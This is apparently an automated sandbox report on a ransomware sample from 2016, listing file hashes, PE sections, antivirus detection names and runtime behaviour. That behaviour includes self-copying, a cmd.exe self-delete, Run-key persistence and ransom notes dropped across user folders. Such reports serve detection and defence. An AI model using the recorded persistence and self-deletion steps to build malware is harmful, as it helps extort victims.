Analysis Date2016-02-12 20:08:38
MD57406c25cb8cd0cafe4eefee4fe803a53
SHA10033fe3fbf4d60e3eaa7e779bf9ed07dd0e5d8b0

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.loki md5: da9e544a30ad9062e523ffb2c1ef578a sha1: ff1d640b514e431ce4aa224f37805900f4e1b5e6 size: 39936
Section.yaps md5: 4e9ae110d036163cc9e7bc548d64c903 sha1: 2b5f38a96011b8c9a47e1611927c87213a383c72 size: 122880
Section.rdata md5: e74e15266f537a7b20bb0a00ab6b5c59 sha1: d1fa2abebb92bac8de145a40363b435655583b36 size: 51712
Section.data md5: 0644fdb40ab58ee135f2df1bff797438 sha1: 7986395865f10a73de56a7593daa6e67bf984e57 size: 24576
Section.rsrc md5: c6709d93f08ad48e575c634e56cd4fd8 sha1: 54061ae65ae51036493608da7162001b3aeeb3fb size: 190976
Timestamp2016-02-09 08:29:27
PackerMicrosoft Visual C++ ?.?
PEhashafc5459ff1574522e376c5ddc7121c8c7a98f1ec
IMPhashee58a88ad6908d3ce187ad220cfd153c
AVCA (E-Trust Ino)Gen:Variant.Zusy.181390
AVRisingNo Virus
AVMcafeeNo Virus
AVAvira (antivir)TR/Crypt.Xpack.446249
AVTwisterNo Virus
AVAd-AwareGen:Variant.Zusy.181390
AVAlwil (avast)No Virus
AVEset (nod32)Win32/Kryptik.ENJR
AVGrisoft (avg)Crypt5.AHLL
AVSymantecNo Virus
AVFortinetMalicious_Behavior.VEX.93
AVBitDefenderGen:Variant.Zusy.181390
AVK7Trojan ( 004ddcf91 )
AVMicrosoft Security EssentialsRansom:Win32/Tescrypt.E
AVMicroWorld (escan)Gen:Variant.Midie.7270
AVMalwareBytesTrojan.MalPack.PK
AVAuthentiumW32/Rovnix.C.gen!Eldorado
AVEmsisoftGen:Variant.Zusy.181390
AVFrisk (f-prot)No Virus
AVIkarusTrojan.Win32.Crypt
AVZillya!No Virus
AVKasperskyTrojan-Ransom.Win32.Bitman.ihq
AVTrend MicroNo Virus
AVVirusBlokAda (vba32)No Virus
AVCAT (quickheal)No Virus
AVBullGuardNo Virus
AVArcabit (arcavir)Gen:Variant.Zusy.181390
AVClamAVNo Virus
AVDr. WebTrojan.Encoder.3817
AVF-SecureGen:Variant.Zusy.181390

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\ohuiqst.exe
Creates ProcessC:\WINDOWS\system32\cmd.exe /c DEL C:\0033FE~1.EXE
Creates ProcessC:\Documents and Settings\Administrator\Application Data\ohuiqst.exe

Process
↳ C:\WINDOWS\system32\cmd.exe /c DEL C:\0033FE~1.EXE

Process
↳ C:\Documents and Settings\Administrator\Application Data\ohuiqst.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝
C:\Documents and Settings\Administrator\Application Data\ohuiqst.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝
C:\Documents and Settings\Administrator\Application Data\ohuiqst.exe\\x00
RegistryHKEY_CURRENT_USER\Software\EF92CC2260EDB86C\data ➝
NULL
RegistryHKEY_CURRENT_USER\Software\xxxsys\ID ➝
NULL
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.js
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\All Users\Documents\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20UI3716.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\All Users\Documents\My Videos\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+ucg.txt
Creates FilePIPE\wkssvc
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\New Stories (Highway Blues).wma
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\All Users\Documents\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Winter.jpg
Creates FileC:\Documents and Settings\All Users\DRM\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Water lilies.jpg
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Templates\winword.doc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\brndlog.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\My Documents\recover_file_nltihqkkb.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\manifest.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Templates\winword2.doc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\All Users\Documents\My Videos\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+ucg.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+ucg.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+ucg.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+ucg.txt
